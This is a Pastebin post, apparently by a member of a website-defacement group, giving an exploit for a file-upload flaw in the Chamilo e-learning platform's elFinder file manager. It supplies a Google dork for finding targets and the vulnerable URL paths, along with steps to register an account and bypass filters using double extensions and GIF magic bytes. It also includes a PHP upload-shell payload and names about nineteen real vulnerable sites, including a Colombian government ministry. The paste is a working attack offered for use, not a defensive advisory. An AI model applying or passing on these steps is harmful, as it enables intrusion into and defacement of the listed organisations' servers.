API tools faq
paste
KingSkrupellos

Chamilo © 2020 Campus v1 ElFinder Shell Upload

KingSkrupellos
May 26th, 2020
170
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.53 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################
  2.  
  3. # Exploit Title : Chamilo © 2020 Campus v1 ElFinder Backdoor Access Shell Upload Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 27 May 2020
  7. # Vendor Homepage : campus.chamilo.org
  8. # Software Version : 1 and 1.x.x etc...
  9. # Software Download Link : chamilo.org/en/download/
  10. # Tested On : Windows and Linux
  11. # Category : WebApps
  12. # Exploit Risk : Medium
  13. # Google Dorks : Powered by Chamilo © 2020 site:com
  14. # Vulnerability Type :
  15. CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
  16. CWE-264 Permissions, Privileges, and Access Controls
  17. CAPEC-650 [ Upload a Web Shell to a Web Server ]
  18. CAPEC-17 [ Using Malicious Files ]
  19. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  20. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  21. # Exploit4Arab : exploit4arab.org/author/KingSkrupellos
  22. # Zone-H : zone-h.org/archive/notifier=KingSkrupellos
  23. zone-h.org/archive/notifier=CyBeRiZM
  24. # Mirror-H : mirror-h.org/search/hacker/948/
  25. mirror-h.org/search/hacker/94/
  26. mirror-h.org/search/hacker/1826/
  27. # Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
  28. defacer.id/archive/team/Cyberizm-Org
  29. # Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
  30. # Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
  31. aljyyosh.org/hacker.php?id=Cyberizm.Org
  32. aljyyosh.org/hacker.php?id=Cyberizm
  33. # Zone-D : zone-d.org/attacker/id/69
  34. # Pastebin : pastebin.com/u/KingSkrupellos
  35. # Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities
  36.  
  37. ####################################################################
  38.  
  39. # Impact :
  40. ***********
  41. This Software is prone to a vulnerability that lets attackers
  42. upload arbitrary files because it fails to adequately sanitize user-supplied input.
  43.  
  44. An attacker can exploit this vulnerability to upload arbitrary code and execute
  45. it in the context of the webserver process. This may facilitate unauthorized access
  46. or privilege escalation; other attacks are also possible.
  47.  
  48. CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
  49. *********************************************************
  50. The software allows the attacker to upload or transfer files of dangerous types that
  51. can be automatically processed within the product's environment.
  52.  
  53. CWE-264 Permissions, Privileges, and Access Controls
  54. ****************************************************
  55. Weaknesses in this category are related to the management of
  56. permissions, privileges, and other security features that are used
  57. to perform access control.
  58.  
  59. CAPEC-650 [ Upload a Web Shell to a Web Server ]
  60. *********************************************************
  61. By exploiting insufficient permissions, it is possible to upload a web shell to a web server in
  62. such a way that it can be executed remotely. This shell can have various capabilities, thereby acting
  63. as a "gateway" to the underlying web server. The shell might execute at the higher permission level
  64. of the web server, providing the ability the execute malicious code at elevated levels.
  65.  
  66. CAPEC-17 [ Using Malicious Files ]
  67. *******************************
  68. An attack of this type exploits a system's configuration that allows an attacker to either directly
  69. access an executable file, for example through shell access; or in a possible worst case allows
  70. an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented
  71. middleware systems which have many integration points are particularly vulnerable, because
  72. both the programmers and the administrators must be in synch regarding the interfaces
  73. and the correct privileges for each interface.
  74.  
  75. ####################################################################
  76.  
  77. # Arbitrary File Upload / Unauthorized File Insert Exploit :
  78. **************************************************
  79. /main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en
  80.  
  81. /main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw
  82.  
  83. Important Note : Ministry of Commerce Industry and Tourism Colombia [ mincit.gov.co ] is vulnerable.
  84.  
  85. If says to you :
  86.  
  87. Unable to connect to backend.
  88. Invalid backend configuration.
  89. Readable volumes not available.
  90.  
  91. Then Register yourself with Admin or Author Account.
  92.  
  93. /main/auth/inscription.php
  94.  
  95. Then you can use File Upload and Shell the sites with .php.gif or php.pjpg
  96.  
  97. Use your Brain :)
  98.  
  99. Vulnerability ScreenShot Proof =>
  100.  
  101. https://www.upload.ee/image/11775401/mincitgovcoexploitelfinder27520.png
  102.  
  103. https://www.upload.ee/image/11775402/elfinderexploit27052020.png
  104.  
  105. Upload your shell in gif format and then rename the format
  106.  
  107. # if the rename function was disabled and add this GIF89;aGIF89;aGIF89;a before <?PHP
  108. # Example
  109.  
  110. GIF89;aGIF89;aGIF89;a<html>
  111. <head>
  112. <title>PHP Test</title>
  113. <form action="" method="post" enctype="multipart/form-data">
  114. <input type="file" name="fileToUpload" id="fileToUpload">
  115. <input type="submit" value="upload file" name="submit">
  116. </form>
  117. </head>
  118. <body>
  119. <?php echo '<p>FILE UPLOAD</p><br>';
  120. $tgt_dir = "uploads/";
  121. $tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
  122. echo "<br>TARGET FILE= ".$tgt_file;
  123. //$filename = $_FILES['fileToUpload']['name'];
  124. echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
  125. if(isset($_POST['submit']))
  126. {
  127. if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
  128. { echo "<br>file exists, try with another name"; }
  129. else {
  130. echo "<br>STARTING UPLOAD PROCESS<br>";
  131. if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
  132. $tgt_file))
  133. { echo "<br>File UPLOADED:- ".$tgt_file; }
  134.  
  135. else { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }
  136. }
  137. }
  138. ?>
  139. </body>
  140. </html>
  141.  
  142. Directory File Path :
  143. **********************
  144. /app/upload/users/[ID-NUMBER]/[YOUR-NUMBER-ID]/my_files/[YOURFILENAME].html
  145.  
  146. [PATH]/my_files/[YOURFILENAME].html
  147.  
  148. ####################################################################
  149.  
  150. # Example Vulnerable Sites :
  151. ************************
  152. [+] campus.chamilo.org/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw
  153.  
  154. [+] universidadsorjuanaines.edu.mx/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en
  155.  
  156. [+] bimwerxacademy.com/lms//main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw
  157.  
  158. [+] mapsnetwork.eu/elearning/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw
  159.  
  160. [+] vle.minerva.bg/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en
  161.  
  162. [+] chamilo.etf.edu/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en
  163.  
  164. [+] petrogasplus.com/chamilo//main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en
  165.  
  166. [+] cloud.octagonafrica.com/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en
  167.  
  168. [+] dsitello.com/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw
  169.  
  170. [+] stocksniperacademy.com/lms/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en
  171.  
  172. [+] margaridaschool.com/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw
  173.  
  174. [+] loreelorza.com/Academia/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en
  175.  
  176. [+] aulavirtual.unitylanguageschool.com/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw
  177.  
  178. [+] lms.mincit.gov.co/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en
  179.  
  180. [+] admejoresseguridadsig.com/aulas/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw
  181.  
  182. [+] chamilo-miage-toulouse.northeurope.cloudapp.azure.com/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en
  183.  
  184. [+] froggyspeak.net/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw
  185.  
  186. [+] campus.adesa-asesoria.com/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en
  187.  
  188. [+] saint-cricq.com/TSTC/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en
  189.  
  190. ####################################################################
  191.  
  192. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  193.  
  194. ####################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!